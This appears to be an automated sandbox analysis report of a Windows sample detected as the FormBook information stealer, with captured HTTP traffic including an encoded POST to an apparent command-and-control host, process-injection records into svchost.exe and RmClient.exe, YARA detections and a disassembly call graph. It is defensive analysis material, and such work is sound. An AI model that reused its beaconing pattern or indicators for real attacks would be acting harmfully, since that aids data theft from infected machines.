                                                                                                                    Data Raw: 38 32 62 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e
                                                                                                                    Data Ascii: 82b1<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">
                                                                                                                    Jan 10, 2025 20:50:36.650217056 CET1236INData Raw: 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66
                                                                                                                    Data Ascii: <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in w
                                                                                                                    Jan 10, 2025 20:50:36.650228024 CET1236INData Raw: 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e 67 22 26
                                                                                                                    Data Ascii: n(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languages"
                                                                                                                    Jan 10, 2025 20:50:36.650233984 CET1236INData Raw: 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65
                                                                                                                    Data Ascii: ges" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.su
                                                                                                                    Jan 10, 2025 20:50:36.650239944 CET1236INData Raw: 63 6d 70 5f 70 61 72 61 6d 73 3a 22 22 29 2b 28 75 2e 63 6f 6f 6b 69 65 2e 6c 65 6e 67 74 68 3e 30 3f 22 26 5f 5f 63 6d 70 66 63 63 3d 31 22 3a 22 22 29 2b 22 26 6c 3d 22 2b 6f 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2b 22 26 6f 3d 22 2b 28 6e
                                                                                                                    Data Ascii: cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{i
                                                                                                                    Jan 10, 2025 20:50:36.650250912 CET1236INData Raw: 7b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 66 72 61 6d 65 22 29 3b 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 3d 22 64 69 73 70 6c 61 79
                                                                                                                    Data Ascii: {if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_ultrablocking" in window&&window.cmp_ultrablocking>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribut
                                                                                                                    Jan 10, 2025 20:50:36.650266886 CET1236INData Raw: 28 61 29 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 7c 7c 61 5b 30 5d 3d 3d 3d 22 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68
                                                                                                                    Data Ascii: (a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersio
                                                                                                                    Jan 10, 2025 20:50:36.650278091 CET1236INData Raw: 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 53 65 63 74 69 6f 6e 22 7c 7c 67 3d 3d 3d 22 67 65 74 46 69 65 6c 64 22 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 65 6c 73 65 7b 5f 5f 67 70 70 2e 71 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79
                                                                                                                    Data Ascii: n"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!
                                                                                                                    Jan 10, 2025 20:50:36.650288105 CET1236INData Raw: 70 5f 73 65 74 53 74 75 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 28 61 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 28 74 79 70 65 6f 66 28 77 69 6e 64 6f 77 5b 61 5d 29 21 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 79 70 65 6f 66 28 77
                                                                                                                    Data Ascii: p_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventL
                                                                                                                    Jan 10, 2025 20:50:36.650299072 CET1236INData Raw: 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f
                                                                                                                    Data Ascii: type="text/javascript">var abp;</script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=1"></script><script type="text/javascript" src="http://digi-searches.com/px.js?ch=2"></script><script type="text/javascript">function
                                                                                                                    Jan 10, 2025 20:50:36.650310993 CET1236INData Raw: 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2e 65 6f 74 22 29 3b 73 72 63 3a 20 75 72 6c 28 22
                                                                                                                    Data Ascii: n-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot");src: url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix") format("embedded-opentype"),url("http://i4.cdn-image.com/__media__/fon


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    25192.168.2.65001376.223.67.189802196C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 20:50:58.232202053 CET836OUTPOST /3irn/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.infovea.tech
                                                                                                                    Origin: http://www.infovea.tech
                                                                                                                    Referer: http://www.infovea.tech/3irn/
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 211
                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36
                                                                                                                    Data Raw: 6e 7a 73 30 54 32 3d 44 58 64 4a 38 55 30 64 37 66 66 34 48 73 6c 43 32 65 6b 4b 6f 43 6e 50 64 6e 33 74 73 62 6b 78 49 44 69 65 72 79 55 57 36 5a 58 65 47 49 69 5a 30 47 4e 4e 76 4c 48 75 71 62 50 54 6e 2f 38 4f 2f 35 6f 4d 30 76 6a 49 51 6e 76 79 71 4a 76 34 49 4e 51 71 51 42 7a 55 6a 6b 55 68 6e 4e 35 4a 4e 77 33 56 47 2b 4e 72 63 50 72 48 35 51 33 33 61 65 4a 39 70 2b 55 75 55 64 64 73 6a 57 43 62 41 50 65 54 33 78 72 4f 62 36 76 62 47 77 2b 51 72 49 42 65 59 69 79 4e 33 4f 66 49 66 69 74 30 67 45 41 68 55 4d 63 34 5a 45 34 4e 74 68 77 36 50 73 38 77 31 44 2f 43 72 57 78 56 31 4c 64 41 6c 44 49 2b 71 7a 6c 4b 54 73 44 79
                                                                                                                    Data Ascii: nzs0T2=DXdJ8U0d7ff4HslC2ekKoCnPdn3tsbkxIDieryUW6ZXeGIiZ0GNNvLHuqbPTn/8O/5oM0vjIQnvyqJv4INQqQBzUjkUhnN5JNw3VG+NrcPrH5Q33aeJ9p+UuUddsjWCbAPeT3xrOb6vbGw+QrIBeYiyN3OfIfit0gEAhUMc4ZE4Nthw6Ps8w1D/CrWxV1LdAlDI+qzlKTsDy
                                                                                                                    Jan 10, 2025 20:50:58.721283913 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                    content-length: 0
                                                                                                                    connection: close


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:14:47:50
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\9MZZG92yMO.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\9MZZG92yMO.exe"
                                                                                                                    Imagebase:0x4c0000
                                                                                                                    File size:1'210'880 bytes
                                                                                                                    MD5 hash:7F427F12CD43C97F6647A6A39735EBA8
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:14:47:53
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\9MZZG92yMO.exe"
                                                                                                                    Imagebase:0x7b0000
                                                                                                                    File size:46'504 bytes
                                                                                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2453321754.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2454199303.0000000003720000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2454931273.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:14:48:13
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe"
                                                                                                                    Imagebase:0xef0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4011798777.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:14:48:15
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\RmClient.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\RmClient.exe"
                                                                                                                    Imagebase:0x510000
                                                                                                                    File size:15'360 bytes
                                                                                                                    MD5 hash:CE765DCC7CDFDC1BFD94CCB772C75E41
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4010406938.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4010091145.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4010291438.0000000002650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:8
                                                                                                                    Start time:14:48:28
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Program Files (x86)\aYVYujvygCSGzJFRXEpcMZyNnbyZVyViorccKAghzRwwsGSyEtAKqOFTbWEv\XBOIFKGKIWT.exe"
                                                                                                                    Imagebase:0xef0000
                                                                                                                    File size:140'800 bytes
                                                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4014572631.0000000004C30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:10
                                                                                                                    Start time:14:48:56
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                    Imagebase:0x7ff728280000
                                                                                                                    File size:676'768 bytes
                                                                                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.6%
                                                                                                                      Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                      Signature Coverage:9.7%
                                                                                                                      Total number of Nodes:2000
                                                                                                                      Total number of Limit Nodes:157
                                                                                                                      execution_graph 100506 1108220 100520 1105e70 100506->100520 100508 11082e0 100523 1108110 100508->100523 100526 1109310 GetPEB 100520->100526 100522 11064fb 100522->100508 100524 1108119 Sleep 100523->100524 100525 1108127 100524->100525 100527 110933a 100526->100527 100527->100522 100528 4c107d 100533 4c708b 100528->100533 100530 4c108c 100564 4e2d40 100530->100564 100534 4c709b __ftell_nolock 100533->100534 100567 4c7667 100534->100567 100538 4c715a 100579 4e050b 100538->100579 100545 4c7667 59 API calls 100546 4c718b 100545->100546 100598 4c7d8c 100546->100598 100548 4c7194 RegOpenKeyExW 100549 4fe8b1 RegQueryValueExW 100548->100549 100553 4c71b6 Mailbox 100548->100553 100550 4fe8ce 100549->100550 100551 4fe943 RegCloseKey 100549->100551 100602 4e0db6 100550->100602 100551->100553 100560 4fe955 _wcscat Mailbox __NMSG_WRITE 100551->100560 100553->100530 100554 4fe8e7 100612 4c522e 100554->100612 100555 4c79f2 59 API calls 100555->100560 100558 4fe90f 100615 4c7bcc 100558->100615 100560->100553 100560->100555 100563 4c3f74 59 API calls 100560->100563 100624 4c7de1 100560->100624 100561 4fe929 100561->100551 100563->100560 100689 4e2c44 100564->100689 100566 4c1096 100568 4e0db6 Mailbox 59 API calls 100567->100568 100569 4c7688 100568->100569 100570 4e0db6 Mailbox 59 API calls 100569->100570 100571 4c7151 100570->100571 100572 4c4706 100571->100572 100628 4f1940 100572->100628 100575 4c7de1 59 API calls 100576 4c4739 100575->100576 100630 4c4750 100576->100630 100578 4c4743 Mailbox 100578->100538 100580 4f1940 __ftell_nolock 100579->100580 100581 4e0518 GetFullPathNameW 100580->100581 100582 4e053a 100581->100582 100583 4c7bcc 59 API calls 100582->100583 100584 4c7165 100583->100584 100585 4c7cab 100584->100585 100586 4c7cbf 100585->100586 100587 4fed4a 100585->100587 100652 4c7c50 100586->100652 100657 4c8029 100587->100657 100590 4c7173 100592 4c3f74 100590->100592 100591 4fed55 __NMSG_WRITE _memmove 100593 4c3f82 100592->100593 100597 4c3fa4 _memmove 100592->100597 100595 4e0db6 Mailbox 59 API calls 100593->100595 100594 4e0db6 Mailbox 59 API calls 100596 4c3fb8 100594->100596 100595->100597 100596->100545 100597->100594 100599 4c7da6 100598->100599 100601 4c7d99 100598->100601 100600 4e0db6 Mailbox 59 API calls 100599->100600 100600->100601 100601->100548 100604 4e0dbe 100602->100604 100605 4e0dd8 100604->100605 100607 4e0ddc std::exception::exception 100604->100607 100660 4e571c 100604->100660 100677 4e33a1 DecodePointer 100604->100677 100605->100554 100678 4e859b RaiseException 100607->100678 100609 4e0e06 100679 4e84d1 58 API calls _free 100609->100679 100611 4e0e18 100611->100554 100613 4e0db6 Mailbox 59 API calls 100612->100613 100614 4c5240 RegQueryValueExW 100613->100614 100614->100558 100614->100561 100616 4c7bd8 __NMSG_WRITE 100615->100616 100617 4c7c45 100615->100617 100620 4c7bee 100616->100620 100621 4c7c13 100616->100621 100618 4c7d2c 59 API calls 100617->100618 100619 4c7bf6 _memmove 100618->100619 100619->100561 100688 4c7f27 59 API calls Mailbox 100620->100688 100623 4c8029 59 API calls 100621->100623 100623->100619 100625 4c7df0 __NMSG_WRITE _memmove 100624->100625 100626 4e0db6 Mailbox 59 API calls 100625->100626 100627 4c7e2e 100626->100627 100627->100560 100629 4c4713 GetModuleFileNameW 100628->100629 100629->100575 100631 4f1940 __ftell_nolock 100630->100631 100632 4c475d GetFullPathNameW 100631->100632 100633 4c477c 100632->100633 100634 4c4799 100632->100634 100636 4c7bcc 59 API calls 100633->100636 100635 4c7d8c 59 API calls 100634->100635 100637 4c4788 100635->100637 100636->100637 100640 4c7726 100637->100640 100641 4c7734 100640->100641 100644 4c7d2c 100641->100644 100643 4c4794 100643->100578 100645 4c7d3a 100644->100645 100646 4c7d43 _memmove 100644->100646 100645->100646 100648 4c7e4f 100645->100648 100646->100643 100649 4c7e62 100648->100649 100651 4c7e5f _memmove 100648->100651 100650 4e0db6 Mailbox 59 API calls 100649->100650 100650->100651 100651->100646 100653 4c7c5f __NMSG_WRITE 100652->100653 100654 4c8029 59 API calls 100653->100654 100655 4c7c70 _memmove 100653->100655 100656 4fed07 _memmove 100654->100656 100655->100590 100658 4e0db6 Mailbox 59 API calls 100657->100658 100659 4c8033 100658->100659 100659->100591 100661 4e5797 100660->100661 100665 4e5728 100660->100665 100686 4e33a1 DecodePointer 100661->100686 100663 4e579d 100687 4e8b28 58 API calls __getptd_noexit 100663->100687 100664 4e5733 100664->100665 100680 4ea16b 58 API calls __NMSG_WRITE 100664->100680 100681 4ea1c8 58 API calls 4 library calls 100664->100681 100682 4e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100664->100682 100665->100664 100668 4e575b RtlAllocateHeap 100665->100668 100671 4e5783 100665->100671 100675 4e5781 100665->100675 100683 4e33a1 DecodePointer 100665->100683 100668->100665 100669 4e578f 100668->100669 100669->100604 100684 4e8b28 58 API calls __getptd_noexit 100671->100684 100685 4e8b28 58 API calls __getptd_noexit 100675->100685 100677->100604 100678->100609 100679->100611 100680->100664 100681->100664 100683->100665 100684->100675 100685->100669 100686->100663 100687->100669 100688->100619 100690 4e2c50 __ioinit 100689->100690 100697 4e3217 100690->100697 100696 4e2c77 __ioinit 100696->100566 100714 4e9c0b 100697->100714 100699 4e2c59 100700 4e2c88 DecodePointer DecodePointer 100699->100700 100701 4e2c65 100700->100701 100702 4e2cb5 100700->100702 100711 4e2c82 100701->100711 100702->100701 100760 4e87a4 59 API calls 2 library calls 100702->100760 100704 4e2d18 EncodePointer EncodePointer 100704->100701 100705 4e2cc7 100705->100704 100706 4e2cec 100705->100706 100761 4e8864 61 API calls 2 library calls 100705->100761 100706->100701 100710 4e2d06 EncodePointer 100706->100710 100762 4e8864 61 API calls 2 library calls 100706->100762 100709 4e2d00 100709->100701 100709->100710 100710->100704 100763 4e3220 100711->100763 100715 4e9c2f EnterCriticalSection 100714->100715 100716 4e9c1c 100714->100716 100715->100699 100721 4e9c93 100716->100721 100718 4e9c22 100718->100715 100745 4e30b5 58 API calls 3 library calls 100718->100745 100722 4e9c9f __ioinit 100721->100722 100723 4e9ca8 100722->100723 100724 4e9cc0 100722->100724 100746 4ea16b 58 API calls __NMSG_WRITE 100723->100746 100729 4e9ce1 __ioinit 100724->100729 100749 4e881d 58 API calls 2 library calls 100724->100749 100727 4e9cad 100747 4ea1c8 58 API calls 4 library calls 100727->100747 100728 4e9cd5 100731 4e9cdc 100728->100731 100732 4e9ceb 100728->100732 100729->100718 100750 4e8b28 58 API calls __getptd_noexit 100731->100750 100736 4e9c0b __lock 58 API calls 100732->100736 100733 4e9cb4 100748 4e309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 100733->100748 100738 4e9cf2 100736->100738 100739 4e9cff 100738->100739 100740 4e9d17 100738->100740 100751 4e9e2b InitializeCriticalSectionAndSpinCount 100739->100751 100752 4e2d55 100740->100752 100743 4e9d0b 100758 4e9d33 LeaveCriticalSection _doexit 100743->100758 100746->100727 100747->100733 100749->100728 100750->100729 100751->100743 100753 4e2d5e RtlFreeHeap 100752->100753 100754 4e2d87 __dosmaperr 100752->100754 100753->100754 100755 4e2d73 100753->100755 100754->100743 100759 4e8b28 58 API calls __getptd_noexit 100755->100759 100757 4e2d79 GetLastError 100757->100754 100758->100729 100759->100757 100760->100705 100761->100706 100762->100709 100766 4e9d75 LeaveCriticalSection 100763->100766 100765 4e2c87 100765->100696 100766->100765 100767 4ffdfc 100800 4cab30 Mailbox _memmove 100767->100800 100771 4cb525 100873 529e4a 89 API calls 4 library calls 100771->100873 100774 500055 100868 529e4a 89 API calls 4 library calls 100774->100868 100776 4cb475 100869 4c8047 100776->100869 100779 4e0db6 59 API calls Mailbox 100792 4c9f37 Mailbox 100779->100792 100780 500064 100784 4cb47a 100784->100774 100795 5009e5 100784->100795 100785 4c7667 59 API calls 100785->100792 100786 4c8047 59 API calls 100786->100792 100788 4e2d40 67 API calls __cinit 100788->100792 100789 4ca057 100790 516e8f 59 API calls 100790->100792 100791 4c7de1 59 API calls 100791->100800 100792->100774 100792->100776 100792->100779 100792->100784 100792->100785 100792->100786 100792->100788 100792->100789 100792->100790 100793 5009d6 100792->100793 100796 4ca55a 100792->100796 100818 4cc8c0 341 API calls 2 library calls 100792->100818 100819 4cb900 60 API calls Mailbox 100792->100819 100877 529e4a 89 API calls 4 library calls 100793->100877 100878 529e4a 89 API calls 4 library calls 100795->100878 100876 529e4a 89 API calls 4 library calls 100796->100876 100799 4e0db6 59 API calls Mailbox 100799->100800 100800->100771 100800->100789 100800->100791 100800->100792 100800->100799 100803 50086a 100800->100803 100805 500878 100800->100805 100807 50085c 100800->100807 100808 4cb21c 100800->100808 100811 516e8f 59 API calls 100800->100811 100813 4cb2b6 100800->100813 100815 53df23 100800->100815 100820 4c9ea0 100800->100820 100844 4c9c90 100800->100844 100863 53c193 85 API calls 2 library calls 100800->100863 100864 53c2e0 96 API calls Mailbox 100800->100864 100865 527956 59 API calls Mailbox 100800->100865 100866 53bc6b 341 API calls Mailbox 100800->100866 100867 51617e 59 API calls Mailbox 100800->100867 100804 4c9c90 Mailbox 59 API calls 100803->100804 100804->100807 100875 529e4a 89 API calls 4 library calls 100805->100875 100807->100789 100874 51617e 59 API calls Mailbox 100807->100874 100849 4c9d3c 100808->100849 100810 4cb22d 100812 4c9d3c 60 API calls 100810->100812 100811->100800 100812->100813 100862 4cf6a3 341 API calls 100813->100862 100879 53cadd 100815->100879 100817 53df33 100817->100800 100818->100792 100819->100792 100821 4c9ebf 100820->100821 100838 4c9eed Mailbox 100820->100838 100822 4e0db6 Mailbox 59 API calls 100821->100822 100822->100838 100823 4cb475 100824 4c8047 59 API calls 100823->100824 100839 4ca057 100824->100839 100825 516e8f 59 API calls 100825->100838 100826 4cb47a 100828 500055 100826->100828 100843 5009e5 100826->100843 100827 4e0db6 59 API calls Mailbox 100827->100838 101024 529e4a 89 API calls 4 library calls 100828->101024 100832 4c8047 59 API calls 100832->100838 100833 4e2d40 67 API calls __cinit 100833->100838 100834 500064 100834->100800 100836 4c7667 59 API calls 100836->100838 100838->100823 100838->100825 100838->100826 100838->100827 100838->100828 100838->100832 100838->100833 100838->100836 100838->100839 100840 5009d6 100838->100840 100842 4ca55a 100838->100842 101022 4cc8c0 341 API calls 2 library calls 100838->101022 101023 4cb900 60 API calls Mailbox 100838->101023 100839->100800 101026 529e4a 89 API calls 4 library calls 100840->101026 101025 529e4a 89 API calls 4 library calls 100842->101025 101027 529e4a 89 API calls 4 library calls 100843->101027 100846 4c9c9b 100844->100846 100845 4c9cd2 100845->100800 100846->100845 101028 4c8cd4 59 API calls Mailbox 100846->101028 100848 4c9cfd 100848->100800 100850 4c9d4a 100849->100850 100860 4c9d78 Mailbox 100849->100860 100851 4c9d50 Mailbox 100850->100851 100852 4c9d9d 100850->100852 100854 4c9d64 100851->100854 100859 4ffa0f 100851->100859 100853 4c8047 59 API calls 100852->100853 100853->100860 100855 4c9dcc 100854->100855 100856 4c9d6f 100854->100856 100854->100860 100855->100860 101029 4c8cd4 59 API calls Mailbox 100855->101029 100857 4ff9e6 VariantClear 100856->100857 100856->100860 100857->100860 100859->100860 101030 516e8f 59 API calls 100859->101030 100860->100810 100862->100771 100863->100800 100864->100800 100865->100800 100866->100800 100867->100800 100868->100780 100870 4c805a 100869->100870 100871 4c8052 100869->100871 100870->100789 101031 4c7f77 59 API calls 2 library calls 100871->101031 100873->100807 100874->100789 100875->100807 100876->100789 100877->100795 100878->100789 100917 4c9837 100879->100917 100883 53cdb9 100884 53cf2e 100883->100884 